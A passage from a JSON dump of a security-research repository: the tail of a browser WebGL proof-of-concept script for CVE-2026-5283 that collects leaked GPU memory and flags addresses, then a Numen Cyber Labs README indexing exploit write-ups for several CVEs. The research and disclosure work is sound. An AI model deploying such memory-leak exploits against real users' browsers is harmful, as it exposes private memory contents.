img.data[di]=px[si];img.data[di+1]=px[si+1];img.data[di+2]=px[si+2];img.data[di+3]=255;\n    }\n    ctx.putImageData(img,0,0);ctx.fillStyle='#fff';ctx.font='11px monospace';\n    ctx.fillText('Layer '+layer,5,12);\n}\n\nL('\\n'+'='.repeat(60));\nif(totalLeaked>0){\n    L('<span class=\"red\">CVE-2026-5283: '+totalLeaked+' bytes leaked from '+leakedData.length+' layers</span>');\n    L('Check above for page-aligned addresses, GPU VA ranges, descriptor pairs');\n    document.title='LEAK';\n}else{\n    L('<span class=\"grn\">Not vulnerable</span>');\n    document.title='OK';\n}\nL('GL error: 0x'+gl.getError().toString(16));\ngl.deleteTexture(tex2);\n</script>\n</body>\n</html>\n"
  },
  {
    "path": "README.md",
    "content": "---\n## The PoC/Exploit of some interesting vulnerabilities\n### Author: Vulnerability Research Team of Numen Cyber Labs\n---\n\n1. TCP/IP RCE Vulnerability (CVE-2022-34718) PoC Restoration and Analysis  \nhttps://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf\n\n2. CVE-2022-36537 Vulnerability Technical Analysis with Exploit  \nhttps://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746\n\n3. CVE-2021-38003: From Leaking TheHole to Chrome Renderer RCE  \nhttps://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078\n\n4. CVE-2022-42889: Text4Shell Vulnerability Technical Analysis  \nhttps://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5\n\n5. Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction Optimization Vulnerability Analysis  \nhttps://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6\n\n6. CVE-2022-3723: based on Google's public PoC  \nhttps://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14\n\n7. CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability  \nhttps://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b\n\n8. CVE-2024-24919: Check Point Security Gateways Arbitrary File Read Vulnerability  \nhttps://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408\n\n9. CVE-2026-5283: Uninitialized GPU Memory Disclosure via Partial Clear in ANGLE (Chrome WebGL)  \nhttps://medium.com/@numencyberlabs/cve-2026-5283-uninitialized-gpu-memory-disclosure-via-partial-clear-in-angle-chrome-webgl-3740ca481149\n\n---\n## The Analysis of Web3-related vulnerabilities\n### Discovered by Numen Web3 security products\n### Author: Web3 Security Team of Numen Cyber Labs\n---\n\n1. Analysis of the First Critical Vulnerability of Aptos Move VM  \nhttps://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e\n\n2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module  \nhttps://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642\n\n"
  }
]